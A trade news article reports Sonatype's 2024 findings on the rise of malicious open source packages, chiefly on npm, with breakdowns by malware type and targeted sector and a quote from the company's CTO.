Open source malware attacks triple in 2024

Malware is thriving in the open source ecosystem

Image:

Open source malware has proliferated rapidly this year

New report uncovers just how much open-source malware has proliferated throughout the course of 2024

A report from software supply chain security platform Sonatype has revealed the extent to which open source malware has proliferated this year. Threat actors are using malicious open source packages to target developers as enterprises flock to open source to build custom AI models.

Traditional malware spreads via email attachments, malicious websites etc. whereas as open source malware disguises itself as legitimate open source software (OSS) components to infiltrate the storage locations of code and other development assets.

An example of open-source malware is the Stargazers Ghost Network discovered by researchers this summer, which utilised Github’s reputation as a trusted tool to push out malware hidden in password protected archives.

It’s intuitive that malware is thriving in an ecosystem with such low barriers to entry, high usage and widespread anonymity.

Popular open source code registry npm represents 98.5% of malicious packages observed. The JavaScript ecosystem’s 70% growth in download requests combined, largely due to AI and spam, with minimal verification processes for new packages have made it a popular target for threat actors.

The bulk of open source malware activity (64.75%) is in PUAs (Potentially Unwanted Applications). These can contain spyware, adware, or tracking components that can compromise the security and privacy of end users. Other prevalent types of open source malware include security holdings packages (24.2%) and data exfiltration (7.86%).

Government organisations are by far the most likely to be targeted by threat actors using open source. Sonatype says 67% of the attacks it blocked in 2024 were targeted at government organisations, 24% at financial services companies, and 2% in the energy, oil & gas sector.

“Software developers have become the prime target for the next evolution of software supply chain attacks,” said Brian Fox, CTO and Co-Founder at Sonatype.

“Open source malware is uniquely nefarious — it sits between endpoint solutions, which can’t detect this method of delivery, and traditional vulnerability analysis. Too many enterprises treat open source malware like vulnerabilities in code, waiting to catch bugs during scanning which is too late. It is imperative for organisations to take a proactive approach, preventing consumption of open source malware before it enters their development pipelines.”